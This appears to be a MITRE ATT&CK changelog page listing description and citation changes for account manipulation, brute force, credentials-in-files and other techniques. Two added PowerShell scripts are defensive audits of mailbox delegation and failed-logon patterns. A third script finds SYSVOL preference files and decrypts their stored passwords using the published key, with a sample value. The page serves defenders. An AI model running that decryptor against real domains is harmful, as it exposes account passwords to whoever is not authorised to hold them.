Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-16 17:45:54.884000+00:00 | 2024-01-16 22:24:38.234000+00:00
description | Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078). | Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
iterable_item_added
STIX Field | Old value | New Value
external_references |  | {'source_name': 'FireEye SMOKEDHAM June 2021', 'description': 'FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html'}

[T1098.002] Account Manipulation: Additional Email Delegate Permissions

Current version: 2.1


Old Description
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)

New Description
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:38:00.554000+00:002024-01-03 15:46:06.706000+00:00
descriptionAdversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. 
- Defending O365 - 2019)Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
external_references[7]['source_name']: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452 -> Mandiant Defend UNC2452 White Paper
external_references[7]['description']: Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021. -> Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.
external_references[7]['url']: https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html -> https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452
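The two persistence mechanisms the description names, mailbox-level delegation created with Add-MailboxPermission and folder-level rights granted to Default or Anonymous on the root or Inbox, can both be audited from the defender's side. The following PowerShell is an added example written for this page; it is not ATT&CK content and not code from the Mandiant or FireEye reports cited above. It assumes an Exchange Online PowerShell session already opened with Connect-ExchangeOnline and uses only read-only cmdlets; the function name and the folder list are this example's own choices.

```powershell
# Added example (not ATT&CK or Mandiant code): audit the two places an adversary
# plants mailbox persistence under T1098.002, mailbox-level delegation
# (Add-MailboxPermission) and folder-level rights for Default/Anonymous.
# Assumes an Exchange Online session opened with Connect-ExchangeOnline.

function Get-MailboxPersistenceFinding {
    [CmdletBinding()]
    param(
        # Optional: restrict to specific mailboxes; default is every user mailbox.
        [string[]]$Identity,
        # Folders to inspect; ':\' is the root (Top of Information Store).
        [string[]]$Folder = @(':\', ':\Inbox')
    )

    $mailboxes = if ($Identity) {
        foreach ($i in $Identity) { Get-Mailbox -Identity $i }
    } else {
        Get-Mailbox -ResultSize Unlimited -RecipientTypeDetails UserMailbox
    }

    foreach ($mbx in $mailboxes) {
        $smtp = $mbx.PrimarySmtpAddress.ToString()

        # 1. Mailbox-level ACEs. SELF and inherited entries are present by default
        #    on every mailbox; anything else was granted explicitly.
        Get-MailboxPermission -Identity $smtp |
            Where-Object { -not $_.IsInherited -and ([string]$_.User) -ne 'NT AUTHORITY\SELF' } |
            ForEach-Object {
                [pscustomobject]@{
                    Mailbox = $smtp
                    Scope   = 'Mailbox'
                    Grantee = [string]$_.User
                    Rights  = ($_.AccessRights -join ',')
                    Deny    = $_.Deny
                }
            }

        # 2. Folder-level ACEs. Default and Anonymous exist on every folder with
        #    AccessRights 'None'; they are a finding only when raised above None.
        #    Any other named grantee on the root or Inbox is reported as well.
        foreach ($f in $Folder) {
            Get-MailboxFolderPermission -Identity "$smtp$f" -ErrorAction SilentlyContinue |
                Where-Object {
                    $user = [string]$_.User
                    if ($user -in 'Default', 'Anonymous') { $_.AccessRights -notcontains 'None' }
                    else { $true }
                } |
                ForEach-Object {
                    [pscustomobject]@{
                        Mailbox = $smtp
                        Scope   = "Folder $f"
                        Grantee = [string]$_.User
                        Rights  = ($_.AccessRights -join ',')
                        Deny    = $false
                    }
                }
        }
    }
}

# Every row returned is an explicit grant that someone should be able to explain.
Get-MailboxPersistenceFinding | Sort-Object Mailbox, Scope | Format-Table -AutoSize
```

Two caveats a practitioner will hit: the folder cmdlet is slow across a large tenant, so run it on a shortlist (executives, finance, the accounts named in an incident) before the whole directory; and a legitimate assistant delegation looks identical to an adversary's, so the output is a review list, not an alert feed. Removing a folder grant is done with Remove-MailboxFolderPermission for named users, while Default and Anonymous are reset with Set-MailboxFolderPermission -AccessRights None rather than removed.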

[T1560] Archive Collected Data

Current version: 1.0


Old Description
An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

New Description
An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
Details
dictionary_item_added (STIX field: new value)
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed (STIX field: old value -> new value)
modified: 2022-01-04 18:44:10.398000+00:00 -> 2024-01-20 00:07:58.958000+00:00
description: old and new text as given under Old Description / New Description above
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'DOJ GRU Indictment Jul 2018', 'description': 'Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.', 'url': 'https://www.justice.gov/file/1080281/download'}

[T1123] Audio Capture

Current version: 1.0


Old Description
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

New Description
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
Details
dictionary_item_added (STIX field: new value)
x_mitre_deprecated: False
dictionary_item_removed (STIX field: old value)
x_mitre_permissions_required: ['User']
values_changed (STIX field: old value -> new value)
modified: 2023-03-30 21:01:36.503000+00:00 -> 2024-01-23 22:53:18.389000+00:00
description: old and new text as given under Old Description / New Description above
x_mitre_attack_spec_version: 3.1.0 -> 3.2.0
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'ESET Attor Oct 2019', 'description': 'Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.', 'url': 'https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf'}

[T1020] Automated Exfiltration

Current version: 1.2


Old Description
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

New Description
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
Details
values_changed (STIX field: old value -> new value)
modified: 2022-04-19 22:50:14.956000+00:00 -> 2024-01-24 00:04:01.066000+00:00
description: old and new text as given under Old Description / New Description above
x_mitre_attack_spec_version: 2.1.0 -> 3.2.0
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'ESET Gamaredon June 2020', 'description': 'Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.', 'url': 'https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/'}

[T1110] Brute Force

Current version: 2.5


Old Description
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.

New Description
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.
Details
values_changed (STIX field: old value -> new value)
modified: 2023-04-14 23:03:34.362000+00:00 -> 2024-01-29 18:53:26.593000+00:00
description: old and new text as given under Old Description / New Description above
x_mitre_attack_spec_version: 3.1.0 -> 3.2.0
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'TrendMicro Pawn Storm Dec 2020', 'description': 'Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html'}
external_references: {'source_name': 'Dragos Crashoverride 2018', 'description': 'Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.', 'url': 'https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf'}
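The description distinguishes online guessing against a service from offline cracking of acquired hashes; the online case leaves failed-logon events behind, and its two common shapes (many attempts against one account, or one attempt against many accounts from a single source) can be told apart from those events alone. The PowerShell below is an added example written for this page, not part of ATT&CK or of the cited reports. It assumes Windows Security Event ID 4625 as the source, the thresholds and window size are illustrative assumptions, and the sample events are constructed inline so the detector runs without access to a real log.

```powershell
# Added example (not from ATT&CK or the cited reports): separate online brute
# force from password spraying in Windows failed-logon events (Event ID 4625).
# Thresholds and the sample events below are assumptions made for this page.

function Get-FailedLogonEvent {
    # Pull live 4625 events and flatten the three fields the detector needs.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time     = $_.TimeCreated
                User     = $data['TargetUserName']
                SourceIp = $data['IpAddress']
            }
        }
}

function Find-BruteForce {
    param(
        [Parameter(Mandatory)] [object[]]$Events,   # objects with Time, User, SourceIp
        [int]$WindowMinutes      = 10,
        [int]$FailureThreshold   = 20,  # one account, one source: credential brute force
        [int]$SprayUserThreshold = 10   # many accounts, one source: password spray
    )
    $epoch = [datetime]'2000-01-01'
    # Bucket by source address and fixed time window, then judge each bucket on
    # its shape: depth against one account versus breadth across many accounts.
    $Events |
        Group-Object -Property { "$($_.SourceIp)|" + [math]::Floor(($_.Time - $epoch).TotalMinutes / $WindowMinutes) } |
        ForEach-Object {
            $bucket  = @($_.Group | Sort-Object Time)
            $byUser  = @($bucket | Group-Object User)   # @() keeps .Count meaning "groups"
            $deepest = $byUser | Sort-Object Count -Descending | Select-Object -First 1
            if ($deepest.Count -ge $FailureThreshold) {
                [pscustomobject]@{ Pattern = 'BruteForce'; SourceIp = $bucket[0].SourceIp
                                   Users = $deepest.Name; Failures = $deepest.Count; WindowStart = $bucket[0].Time }
            }
            if ($byUser.Count -ge $SprayUserThreshold) {
                [pscustomobject]@{ Pattern = 'PasswordSpray'; SourceIp = $bucket[0].SourceIp
                                   Users = ($byUser.Name -join ','); Failures = $bucket.Count; WindowStart = $bucket[0].Time }
            }
        }
}

# Constructed sample: 25 failures against one service account from 10.0.0.5,
# one failure each against 12 accounts from 203.0.113.7, and two benign typos.
$t0 = Get-Date '2024-01-29T08:00:00'
$sample = [System.Collections.Generic.List[object]]::new()
foreach ($i in 1..25) { $sample.Add([pscustomobject]@{ Time = $t0.AddSeconds($i * 5);  User = 'svc_backup'; SourceIp = '10.0.0.5' }) }
foreach ($i in 1..12) { $sample.Add([pscustomobject]@{ Time = $t0.AddSeconds($i * 20); User = "user$i";     SourceIp = '203.0.113.7' }) }
$sample.Add([pscustomobject]@{ Time = $t0.AddMinutes(3); User = 'alice'; SourceIp = '10.0.0.9' })
$sample.Add([pscustomobject]@{ Time = $t0.AddMinutes(4); User = 'alice'; SourceIp = '10.0.0.9' })

Find-BruteForce -Events $sample.ToArray() | Format-Table -AutoSize
# Against a live host: Find-BruteForce -Events (Get-FailedLogonEvent)
```

Fixed windows are deliberately simple: an attacker whose run straddles a window boundary is split in two and may fall under both thresholds, so production logic normally uses a sliding window or a SIEM's native time bucketing. Spraying that rotates source addresses (the behaviour the Pawn Storm report describes for cloud services) will not group on SourceIp at all and needs the grouping key changed to something like the target service or user agent.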

[T1092] Communication Through Removable Media

Current version: 1.0


Old Description
Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

New Description
Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.
Details
dictionary_item_added (STIX field: new value)
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed (STIX field: old value -> new value)
modified: 2020-07-14 19:44:50.871000+00:00 -> 2024-01-31 03:17:42.004000+00:00
description: old and new text as given under Old Description / New Description above
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'ESET Sednit USBStealer 2014', 'description': 'Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.', 'url': 'http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/'}

[T1136] Create Account

Current version: 2.4


Old Description
Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

New Description
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
Details
values_changed (STIX field: old value -> new value)
modified: 2023-10-16 17:42:28.207000+00:00 -> 2024-01-31 20:46:43.215000+00:00
description: old and new text as given under Old Description / New Description above
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Symantec WastedLocker June 2020', 'description': 'Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us'}

[T1552.001] Unsecured Credentials: Credentials In Files

Current version: 1.2


Old Description
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)

New Description
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
Details
values_changed (STIX field: old value -> new value)
modified: 2023-08-23 22:24:50.812000+00:00 -> 2024-04-15 21:33:00.213000+00:00
description: old and new text as given under Old Description / New Description above
x_mitre_attack_spec_version: 3.1.0 -> 3.2.0
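The Group Policy Preferences case in the description is worth a concrete check because the stored value is not a hash but a reversible ciphertext: the `cpassword` attribute in preference XML under SYSVOL is AES-256-CBC with a key Microsoft itself published, a zero IV, and a UTF-16LE plaintext, so anyone who can read SYSVOL (every domain user) recovers the password. The PowerShell below is an added example for this page, not ATT&CK code and not the tooling from the cited reports; it assumes a readable SYSVOL path, and the sample Groups.xml it writes to a temp directory is constructed here, using the cpassword value that public writeups of this issue commonly reproduce.

```powershell
# Added example (not ATT&CK code): find and decrypt Group Policy Preferences
# passwords stored in SYSVOL, the 'cpassword' case referenced under T1552.001.
# The AES-256 key is the one Microsoft published for this feature; the IV is
# all zeros and the plaintext is UTF-16LE. The sample XML below is constructed
# for this page.

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # Preference files strip the Base64 '=' padding; restore it before decoding.
    $b64 = $CPassword + ('=' * ((4 - $CPassword.Length % 4) % 4))
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                        0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    $aes.IV      = New-Object byte[] 16
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $cipher = [Convert]::FromBase64String($b64)
    $plain  = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    [System.Text.Encoding]::Unicode.GetString($plain)
}

function Find-GppPassword {
    # Walk a SYSVOL tree (e.g. \\contoso.local\SYSVOL or an offline copy) for
    # preference files that carry a cpassword attribute.
    param([Parameter(Mandatory)][string]$Path)
    $files = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path $Path -Recurse -Include $files -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_.FullName
        ([xml](Get-Content -Raw -Path $file)).SelectNodes('//*[@cpassword]') | ForEach-Object {
            # Each preference type names the account attribute differently.
            $account = $_.userName
            if (-not $account) { $account = $_.accountName }
            if (-not $account) { $account = $_.runAs }
            [pscustomobject]@{
                File     = $file
                Account  = $account
                Password = ConvertFrom-GppPassword -CPassword $_.cpassword
            }
        }
    }
}

# Constructed sample Groups.xml so the script runs without domain access.
$demo = Join-Path $env:TEMP 'gpp-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
'@ | Set-Content -Path (Join-Path $demo 'Groups.xml') -Encoding UTF8

Find-GppPassword -Path $demo | Format-Table -AutoSize
```

The defensive use is the same scan pointed at the live SYSVOL share: any hit means the password has been readable by every domain member since the preference was created, so the account needs a reset, not just removal of the XML. MS14-025 stopped new passwords being written this way but did not remove existing ones.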

[T1565] Data Manipulation

Current version: 1.1


Old Description
Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

New Description
Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
Details
values_changed (STIX field: old value -> new value)
modified: 2022-04-19 23:03:02.016000+00:00 -> 2024-02-02 17:18:39.004000+00:00
description: old and new text as given under Old Description / New Description above
x_mitre_attack_spec_version: 2.1.0 -> 3.2.0
iterable_item_added (STIX field: new value)
